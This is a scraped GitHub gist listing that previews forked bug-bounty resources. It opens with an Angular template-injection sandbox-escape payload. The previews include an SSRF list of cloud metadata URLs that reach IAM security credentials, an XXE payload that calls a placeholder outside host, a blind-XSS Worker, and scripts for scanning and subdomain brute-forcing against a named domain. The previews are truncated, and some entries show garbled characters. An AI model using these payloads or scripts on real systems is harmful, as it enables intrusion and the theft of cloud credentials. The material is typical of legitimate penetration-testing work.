{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
MrRunt1me affilares
affilares
/ cloud_metadata.txt
Created
September 9, 2019 16:16
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
affilares
/ XXE_payloads
Created
September 9, 2019 16:18
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
affilares
/ AngularTI.md
Created
September 9, 2019 16:27
— forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
affilares
/ all.txt
Created
September 10, 2019 14:38
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
affilares
/ content_discovery_all.txt
Created
September 10, 2019 14:38
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
affilares
/ all.txt
Created
September 10, 2019 14:38
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
affilares
/ blind-xss-cloudflare-worker.js
Created
September 13, 2019 16:19
— forked from vavkamil/blind-xss-cloudflare-worker.js
Serverless Blind XSS hunter with Cloudflare Worker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| addEventListener("fetch", event => { | |
| event.respondWith(handleRequest(event.request)) | |
| }) | |
| //////////////////////////////////////////////////////////////////////////////////////////////////// | |
| // ! DON'T LEAK THE SECRETS ! | |
| // Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/ | |
| const telegram_token = "*****REDACTED*****"; | |
| const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage"; |
affilares
/ nmapburp.sh
Created
September 14, 2019 05:52
— forked from jgamblin/nmapburp.sh
NMap a network and send all open web servers to Burp.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Script to Scan All Sites Found With A Simple NMAP Scan With Burp. | |
| sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}') | |
| for site in $sites | |
| do | |
| curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1 | |
| printf "Scanning %s with burp.\\n" "$site" | |
| done |
affilares
/ run.js
Created
September 17, 2019 15:44
— forked from marzavec/run.js
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Developer: Marzavec ( https://github.com/marzavec ) | |
| Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done. | |
| Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz. | |
| */ | |
| const rootTld = 'lyka.pro'; // change to your target's root tld | |
| // url to newline seperated wordlist | |
| const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt'; |
affilares
/ .profile
Created
September 28, 2019 14:21
— forked from denji/.profile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| stty erase | |
| # Setting the path for MacPorts. | |
| export PATH=/opt/local/bin:/opt/local/sbin:/opt/usr/bin:$PATH | |
| # export PATH=/opt/local/lib/postgresql82/bin:/opt/local/lib/mysql5/bin:/WebKit/WebKitTools/Scripts:$PATH | |
| export PATH=~/Development/bin:$PATH | |
| export PATH=$PATH:"/Library/Application Support/VMware Fusion/" | |
| # export PATH=$PATH:"/opt/android-sdk-mac_x86-1.5_r2/tools" | |
| export PATH=$PATH:"/opt/PalmSDK/Current/bin" |